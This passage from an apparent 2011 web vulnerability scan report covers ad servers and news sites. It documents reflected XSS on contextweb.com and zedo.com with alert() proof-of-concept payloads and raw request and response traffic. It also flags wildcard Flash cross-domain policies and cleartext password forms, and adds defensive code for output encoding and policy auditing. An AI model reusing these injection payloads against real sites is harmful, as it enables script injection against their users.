Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB30
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2123
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:50 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj22348'%3balert(1)//7865b00c16b; domain=.contextweb.com; expires=Sun, 29-Jan-2012 01:39:51 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 8:39:51 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...
<img src="http://tags.bluekai.com/site/3358?id=gFEcJzqCjXJj22348';alert(1)//7865b00c16b" height="1" width="1" />
...[SNIP]...

4.1045. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1626'-alert(1)-'2bc9ddafdc1 was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9e1626'-alert(1)-'2bc9ddafdc1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2187
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 29 Jan 2011 01:39:52 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sun, 29-Jan-2012 01:39:52 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 8:39:52 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.,513102,,,TOT09,RCQU1,RCQU9e1626'-alert(1)-'2bc9ddafdc1,300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...
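Added worked example (not code from ZEDO, ContextWeb or the scanner) for findings 4.1043 to 4.1045: in each case a cookie value is concatenated into a quoted JavaScript string literal, so a matching quote in the value ends the literal and everything after it is parsed as code. The block below rebuilds the shape of the fm.js line, puts a hardened version beside it that encodes the value as a JavaScript string literal instead of concatenating it, and evaluates both with an instrumented alert() to show which one executes the reported payload. The function names and the Node.js evaluation harness are assumptions, not identifiers from the scanned application.

```javascript
// Added example, not ZEDO's or ContextWeb's code. renderVulnerable,
// renderSafe, jsStringLiteral and evaluate are illustrative names.

// Vulnerable: raw concatenation into a double-quoted literal, the same shape
// as `var zzStr = "s=2;u=<cookie>;z=" + Math.random();` in the fm.js response.
function renderVulnerable(cookieValue) {
  return 'var zzStr = "s=2;u=' + cookieValue + ';z=" + Math.random();';
}

// Hardened: JSON.stringify escapes " and \ ; the extra replace encodes < > &
// and the U+2028/U+2029 line terminators so the literal can never close the
// enclosing <script> element or break an older JavaScript parser.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafe(cookieValue) {
  return 'var zzStr = "s=2;u=" + ' + jsStringLiteral(cookieValue) +
    ' + ";z=" + Math.random();';
}

// Run a generated snippet with alert() replaced by a counter. new Function
// gives the snippet its own scope; `alert` is supplied as the only free name
// the injected payload relies on.
function evaluate(script) {
  let alertCalls = 0;
  const alert = () => { alertCalls += 1; };
  let zzStr;
  let error = null;
  try {
    zzStr = new Function('alert', script + '\nreturn zzStr;')(alert);
  } catch (e) {
    error = e.name;
  }
  return { alertCalls, zzStr, error };
}

// The ZEDOIDA cookie value from finding 4.1043, payload included.
const REPORTED_PAYLOAD = 'INmz6woBADYAAHrQ5V4AAACH~010411ae9a4"-alert(1)-"4d1fa70ea4e';

// Evaluate both renderings of one cookie value side by side.
function compare(cookieValue) {
  return {
    vulnerable: evaluate(renderVulnerable(cookieValue)),
    safe: evaluate(renderSafe(cookieValue)),
  };
}

console.log(JSON.stringify(compare(REPORTED_PAYLOAD), null, 2));
```

Run with node. In the vulnerable rendering the payload's quotes turn the literal into `"..." - alert(1) - "..."`, so alert runs and zzStr ends up as NaN; in the hardened rendering the same value round-trips into zzStr unchanged and nothing executes. The encoder also covers the single-quote payload from 4.1044 and a value containing `</script>`, because the literal is produced by an encoder rather than by concatenation. The report's remediation still applies: where the script can read the cookie itself instead of having the server echo it, the value never enters script context at all.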

4.1046. http://xads.zedo.com/ads2/c [a parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads2/c

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efd3"style%3d"x%3aexpression(alert(1))"d0649ea4848 was submitted in the a parameter. This input was echoed as 6efd3"style="x:expression(alert(1))"d0649ea4848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style%3d"x%3aexpression(alert(1))"d0649ea4848 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:34 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:34 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:34 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:34 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style="x:expression(alert(1))"d0649ea4848
Vary: Accept-Encoding
Content-Length: 449
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style="x:expression(alert(1))"d0649ea4848">
...[SNIP]...

4.1047. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads2/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a1b"style%3d"x%3aexpression(alert(1))"1924c3dd077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98a1b"style="x:expression(alert(1))"1924c3dd077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style%3d"x%3aexpression(alert(1))"1924c3dd077=1 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:36 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:36 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:36 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:36 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style="x:expression(alert(1))"1924c3dd077=1
Vary: Accept-Encoding
Content-Length: 456
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&amp;98a1b"style="x:expression(alert(1))"1924c3dd077=1">
...[SNIP]...
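Added worked example (not ZEDO's code) for findings 4.1046 and 4.1047. The 302 bodies above encode & as &amp; (visible in the 4.1047 response) but leave the double quote alone, so a k= value or a parameter name that ends the href attribute is free to add a style attribute of its own. The block puts that partial encoding beside a full HTML attribute encoder and parses the resulting anchor tag to show which attributes a browser would see. The rotator URL is constructed and the function names are illustrative.

```javascript
// Added example, not ZEDO's code. The rotator URL is constructed; function
// names are illustrative.

// Reproduces the encoding visible in the response: only & is escaped.
function encodeAmpersandOnly(value) {
  return String(value).replace(/&/g, '&amp;');
}

// Full encoding for a double-quoted HTML attribute value: every character
// that can end the value or start an entity is replaced.
const ATTR_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeAttribute(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ENTITIES[ch]);
}

// Inverse of encodeAttribute, used to confirm the value round-trips.
function decodeEntities(text) {
  return text.replace(/&(amp|lt|gt|quot|#x27);/g, (_, name) =>
    ({ amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" })[name]);
}

// The 302 body shape from the report, with a pluggable encoder.
function renderRedirectBody(location, encode) {
  return '<p>The document has moved <a href="' + encode(location) + '">here</a>.</p>';
}

// Minimal parser for the attributes of the first <a> tag. An injection that
// breaks out of href shows up as additional attribute names.
function parseAnchorAttributes(html) {
  const attrs = {};
  const tag = /<a\s([^>]*)>/.exec(html);
  if (!tag) return attrs;
  const re = /([^\s="]+)(?:="([^"]*)")?/g;
  let m;
  while ((m = re.exec(tag[1])) !== null) attrs[m[1]] = m[2] === undefined ? '' : m[2];
  return attrs;
}

// Payload from finding 4.1046 appended to a constructed rotator URL.
const REPORTED_PAYLOAD = '6efd3"style="x:expression(alert(1))"d0649ea4848';
const LOCATION = 'http://rotator.example/servlet/ajrotator/' + REPORTED_PAYLOAD;

// Attributes a browser would see under each encoder.
function compare(location) {
  return {
    partial: parseAnchorAttributes(renderRedirectBody(location, encodeAmpersandOnly)),
    full: parseAnchorAttributes(renderRedirectBody(location, encodeAttribute)),
  };
}

console.log(JSON.stringify(compare(LOCATION), null, 2));
```

Under the ampersand-only encoder the anchor gains a style attribute; under the full encoder it has only href, and decoding that href gives the original location back. As the report notes, a browser normally discards the body of a 302, and style="x:expression(...)" only ever executed in older Internet Explorer, so this particular reflection is hard to exploit; the encoding defect is still worth fixing because the same body would be rendered if the redirect were ever suppressed.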

5. Flash cross-domain policy
There are 2 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
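Added worked example (not Burp's or the scanned sites' code) for the policy review the remediation asks for: a small auditor that lists every allow-access-from entry in a crossdomain.xml and flags the bare wildcard, a *.domain entry that trusts every subdomain, secure="false" on a policy served over HTTPS, and an over-broad site-control element. The wildcard policy string is constructed to match the two responses in this section; the restrictive policy and its example.com origins are hypothetical, and auditCrossDomainPolicy is an illustrative name.

```javascript
// Added example, not Burp's or the scanned sites' code.
// auditCrossDomainPolicy is an illustrative name.

function auditCrossDomainPolicy(xml, servedOverHttps) {
  const allowed = [];
  const findings = [];
  const entryRe = /<allow-access-from\b([^>]*)>/g;
  let entry;
  while ((entry = entryRe.exec(xml)) !== null) {
    // Collect the attributes of this entry: domain, secure, to-ports.
    const attrs = {};
    const attrRe = /([\w-]+)\s*=\s*"([^"]*)"/g;
    let attr;
    while ((attr = attrRe.exec(entry[1])) !== null) attrs[attr[1]] = attr[2];
    const domain = attrs.domain || '';
    allowed.push(domain);
    if (domain === '*') {
      findings.push({ severity: 'high', domain,
        reason: 'any origin can make credentialed requests to this host from Flash' });
    } else if (domain.startsWith('*.')) {
      findings.push({ severity: 'medium', domain,
        reason: 'every subdomain is trusted; one vulnerable subdomain undermines the policy' });
    }
    if (servedOverHttps && attrs.secure === 'false') {
      findings.push({ severity: 'medium', domain,
        reason: 'secure="false" lets a SWF loaded over plain HTTP read this HTTPS origin' });
    }
  }
  if (/<site-control\b[^>]*permitted-cross-domain-policies\s*=\s*"all"/.test(xml)) {
    findings.push({ severity: 'low', domain: '',
      reason: 'permitted-cross-domain-policies="all" honours policy files anywhere on the host' });
  }
  return { allowed, findings };
}

// Constructed to match the ad.afy11.net and tt3.zedo.com responses.
const WILDCARD_POLICY = `<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>`;

// Hypothetical restrictive replacement: named origins only, TLS only,
// and no policy files honoured outside the master file.
const RESTRICTED_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="www.example.com" secure="true" />
<allow-access-from domain="cdn.example.com" secure="true" />
</cross-domain-policy>`;

console.log(JSON.stringify(auditCrossDomainPolicy(WILDCARD_POLICY, true), null, 2));
console.log(JSON.stringify(auditCrossDomainPolicy(RESTRICTED_POLICY, true), null, 2));
```

The severity mapping follows the report: a bare wildcard is high because Flash sends the user's cookies with the cross-domain request, so any page the user visits can act as that user against the publishing host. A wildcard is only defensible for a host that serves nothing but public, unauthenticated content, which an ad server's tracking endpoints (cookied, as the responses above show) are not.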


5.1. http://ad.afy11.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 16:39:29 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.2. https://tt3.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://tt3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tt3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "24a6846-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=86400
Date: Sat, 29 Jan 2011 01:41:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6. Cleartext submission of password
There are 61 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
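Added worked example (not the scanned sites' code) for this issue class: a checker that finds every form carrying a password field and resolves its action against the page URL the way a browser does, so a fragment-only action such as #comment_form and a relative path such as /members.aspx are judged by the scheme of the page they sit on, plus a second helper that lists Set-Cookie headers without the Secure flag, the point the remediation makes about session tokens. The HTML and cookie headers are constructed from the snippets in this section; the HTTPS form is a hypothetical fix and the function names are illustrative.

```javascript
// Added example, not the scanned sites' code. findPasswordForms and
// cookiesWithoutSecure are illustrative names; the sample markup below is
// constructed from the response snippets in this section.

function findPasswordForms(pageUrl, html) {
  const results = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let form;
  while ((form = formRe.exec(html)) !== null) {
    const actionAttr = /\baction\s*=\s*"([^"]*)"/i.exec(form[1]);
    // No action, or a fragment like "#comment_form", submits to the page itself,
    // so the page's own scheme decides whether the password travels in clear.
    const target = new URL(actionAttr ? actionAttr[1] : '', pageUrl);
    const fields = [];
    const inputRe = /<input\b[^>]*\btype\s*=\s*"password"[^>]*>/gi;
    let input;
    while ((input = inputRe.exec(form[2])) !== null) {
      const name = /\bname\s*=\s*"([^"]*)"/i.exec(input[0]);
      fields.push(name ? name[1] : '(unnamed)');
    }
    if (fields.length > 0) {
      results.push({ action: target.href, fields, cleartext: target.protocol !== 'https:' });
    }
  }
  return results;
}

// Names of cookies set without the Secure attribute.
function cookiesWithoutSecure(setCookieHeaders) {
  return setCookieHeaders
    .filter((header) => !/;\s*secure\s*(;|$)/i.test(header))
    .map((header) => header.slice(0, header.indexOf('=')).trim());
}

// Constructed from the ar.imlive.com response (6.1).
const IMLIVE_HTML = `<div id="ctl00_pnlSignUpHome" class="LoginArea">
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table class="lgntbl">
<tr><td><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td></tr>
</table></form></div>`;

// Constructed from the bostonherald.com comment registration form (6.2).
const HERALD_HTML = `<form name="register" method="POST" action="#comment_form"
onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">
<input type="password" value="" name="password" id="r_password"/>
<input type="password" value="" name="confirm_password" id="r_confirm_password"/>
</form>`;

// Hypothetical fix: the 6.4 login form with an absolute HTTPS action.
const FIXED_HTML = `<form name="register" action="https://bostonherald.com/users/login?returnto=/users/" method="POST">
<input type="password" value="" name="password"/>
</form>`;

// Constructed from the Set-Cookie headers in 6.1, plus one correctly flagged cookie.
const SAMPLE_COOKIES = [
  'ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly',
  'spvdr=vd=55564d24-301b-478f-82b3-5dcbbd104f3e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:43 GMT; path=/',
  'sid=0123456789abcdef; path=/; Secure; HttpOnly',
];

console.log(findPasswordForms('http://ar.imlive.com/', IMLIVE_HTML));
console.log(findPasswordForms('http://bostonherald.com/track/inside_track/view.bg?articleid=1312557', HERALD_HTML));
console.log(findPasswordForms('http://bostonherald.com/users/login', FIXED_HTML));
console.log(cookiesWithoutSecure(SAMPLE_COOKIES));
```

One caveat the scanner shares: the bostonherald registration form's onSubmit handler returns false and calls register_user(), so the browser never submits the declared action; the real destination has to be read from that script, and the same clear-text question then applies to it. Note also that the ASP.NET_SessionId cookie in the imlive responses is HttpOnly but not Secure, so even a login moved to HTTPS would keep sending the session token over plain HTTP on every other request to the host.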


6.1. http://ar.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=g05urdbhcc12xm55kjeeji45; path=/; HttpOnly
Set-Cookie: spvdr=vd=55564d24-301b-478f-82b3-5dcbbd104f3e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:43 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:42 GMT
Connection: close
Content-Length: 18354
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.2. http://bostonherald.com/track/inside_track/view.bg

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

#comment_form

The form contains the following password fields:

password
confirm_password

Request

GET /track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 69819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.3. http://bostonherald.com/track/star_tracks/view.bg

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

#comment_form

The form contains the following password fields:

password
confirm_password

Request

GET /track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:51 GMT
Server: Apache
